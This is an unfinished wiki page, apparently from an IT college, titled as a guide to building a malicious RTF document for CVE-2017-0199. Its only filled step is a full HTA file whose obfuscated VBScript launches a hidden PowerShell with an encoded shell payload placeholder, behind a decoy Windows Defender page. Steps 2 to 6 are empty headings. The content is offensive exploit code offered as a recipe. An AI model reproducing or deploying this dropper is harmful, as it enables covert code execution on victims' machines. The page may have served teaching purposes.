CVE-2017-0199 Malicious RTF Document

From ICO wiki
Revision as of 20:33, 2 May 2017 by Lphanvan (talk | contribs) (Created page with "==CVE-2017-0199 Malicious RTF Document== ===Step 1 === Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta" <pre> <...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search

CVE-2017-0199 Malicious RTF Document

Step 1

Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta" 

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
   <html xmlns="http://www.w3.org/1999/xhtml">  
   <head>  
   <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />  
   <title>Bonjour</title>  
 <script language="VBScript">  
  Set owFrClN0giJ = CreateObject("Wscript.Shell")   
  Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")  
  If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then  
   owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"  
  End If  
 </script>  
 <hta:application  
     id="oHTA"  
     applicationname="Bonjour"  
     application="yes"  
   >  
   </hta:application>  
   </head>  
   <div>   
   <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">  
   </object></div>    
   <body>  
   </body>  
   </html>

Step 2

Step 3

Step 4

Step 5

Step 6

Retrieved from "https://wiki.itcollege.ee/index.php?title=CVE-2017-0199_Malicious_RTF_Document&oldid=120922"